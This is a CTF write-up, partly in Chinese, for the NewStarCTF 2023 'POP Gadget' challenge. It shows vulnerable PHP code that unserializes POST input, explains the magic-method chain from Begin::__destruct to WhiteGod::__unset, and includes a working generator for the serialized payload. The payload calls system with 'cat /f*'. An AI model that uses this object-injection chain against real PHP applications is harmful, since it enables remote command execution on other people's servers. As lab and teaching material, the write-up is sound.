[NewStarCTF 2023 公开赛道]POP Gadget

<?php
// The script prints its own source each time it runs, so the class definitions
// below are fully visible to whoever sends the POST body.
highlight_file(__FILE__);

/**
 * Start of the object chain: __destruct() runs on its own when an instance is
 * released, with no explicit call from application code.
 *
 * $name is handed to preg_match() as the subject, i.e. it is used in string
 * context. If it holds an object instead of a string, PHP converts it through
 * that object's __toString(). A destructor that touches properties settable via
 * unserialize() is therefore enough to hand control to another class.
 */
class Begin
{
    public $name;

    public function __destruct()
    {
        // Result is 1 when $name contains at least one ASCII letter or digit.
        $hasAlnum = preg_match("/[a-zA-Z0-9]/", $this->name);
        echo $hasAlnum ? "Hello" : "Welcome to NewStarCTF 2023!";
    }
}

/**
 * String-conversion hook: __toString() runs whenever an instance is used as a
 * string, and before returning it invokes $func with no arguments.
 *
 * The private modifier does not shield $func from deserialized input;
 * unserialize() restores private properties from the serialized data like any
 * other property.
 */
class Then
{
    private $func;

    public function __toString()
    {
        // Whatever $func holds is called: a function name, a closure, or an
        // object that defines __invoke().
        $callable = $this->func;
        $callable();

        return "Good Job!";
    }
}

/**
 * Catch-all method handler: __call() receives every call to a method that
 * Handle does not define. The requested name and arguments are ignored; the
 * call is always forwarded to end() on $obj.
 */
class Handle
{
    protected $obj;

    public function __call($func, $vars)
    {
        // $func and $vars are deliberately unused: any undefined method lands here.
        $target = $this->obj;
        $target->end();
    }
}

/**
 * Callable object: __invoke() lets an instance be called like a function and
 * calls getStr() on $obj.
 *
 * No class in this listing defines getStr(), so when $obj has a __call()
 * handler that handler takes the call instead.
 */
class Super
{
    protected $obj;

    public function __invoke()
    {
        $receiver = $this->obj;
        $receiver->getStr();
    }

    /**
     * Terminates the script with a fixed message. Reaching this end() stops
     * execution, so nothing after it in a call sequence runs.
     */
    public function end()
    {
        exit("==GAME OVER==");
    }
}

/**
 * end() unsets a property named "log" on $handle.
 *
 * No class in this listing declares a "log" property, so on an object that
 * defines __unset() the operation is routed to that handler.
 */
class CTF
{
    public $handle;

    public function end()
    {
        $holder = $this->handle;
        unset($holder->log);
    }
}

/**
 * Sink of the chain: __unset() calls $func with $var as its only argument.
 *
 * SECURITY: both properties are public and come straight from the serialized
 * data, so this is a call to a caller-chosen function with a caller-chosen
 * argument. A handler like this must never be reachable from data that passes
 * through unserialize(); dispatch through a fixed allow-list of callables
 * instead of a property value.
 */
class WhiteGod
{
    public $func;
    public $var;

    public function __unset($var)
    {
        // The $var parameter (name of the property being unset) is not used;
        // the argument passed on is the $var property.
        $callable = $this->func;
        $callable($this->var);
    }
}

// SECURITY: root cause of the challenge. The raw POST field "pop" is passed to
// unserialize(), so the client decides which of the classes above are
// instantiated and what every property holds. The result is not assigned to
// anything, so the object graph is released as soon as this statement finishes
// and Begin::__destruct() runs; the @ only hides warnings from malformed input.
// Mitigation: do not unserialize request data. Use json_decode() and build
// objects explicitly, or at minimum pass ['allowed_classes' => false] so that
// none of the classes defined in this file are instantiated.
@unserialize($_POST['pop']);

这是一道 PHP 反序列化的题。

image-20250302144017861

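我们发现 5 存在命令执行漏洞(标号见上图;带有 __unset 的是 WhiteGod 类,它会把属性 $func 当作函数、以 $var 为参数调用),所以我们需要触发 5 的 __unset 魔术方法。逐步往上推,就能发现从 1->2->3->4->5 的反序列化链,对应到代码中的调用顺序是:Begin::__destruct → Then::__toString → Super::__invoke → Handle::__call → CTF::end → WhiteGod::__unset。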

<?php
// Proof-of-concept generator from the write-up: it re-declares the challenge's
// class names as bare property holders, links the objects together and prints
// the serialized form. The serialized data carries only class names, property
// names and values; none of the challenge's methods are needed here.
// Carried over from the challenge source; it prints this file ahead of the
// serialized string.
highlight_file(__FILE__);

class Begin{
public $name;

}

class Then{
// Declared private in the challenge, public here.
// NOTE(review): this relies on unserialize() tolerating a visibility mismatch
// (PHP 7.1+ behaviour, as far as I know) — confirm against the target runtime.
// Defender takeaway: private/protected is not a barrier for deserialized data.
public $func;

}

class Handle{
// Declared protected in the challenge, public here (same caveat as Then::$func).
public $obj;

}

class Super{
// Declared protected in the challenge, public here (same caveat as Then::$func).
public $obj;

}

class CTF{
public $handle;

}

class WhiteGod{
// Property defaults end up in the serialized data: the function name and the
// single argument that WhiteGod::__unset() in the challenge passes to it.
public $func="system";
public $var="cat /f*";
}

// The nesting mirrors the call order in the challenge source:
// Begin::$name -> Then::$func -> Super::$obj -> Handle::$obj -> CTF::$handle -> WhiteGod.
$pop=new Begin();
$pop->name=new Then();
$pop->name->func=new Super();
$pop->name->func->obj=new Handle();
$pop->name->func->obj->obj=new CTF();
$pop->name->func->obj->obj->handle=new WhiteGod();
// Detection note: serialized objects appear in request bodies as
// O:<length>:"ClassName": tokens, which is worth alerting on for any endpoint
// that is not supposed to receive them.
echo serialize($pop);

运行,提交,得到flag

image-20250302145055319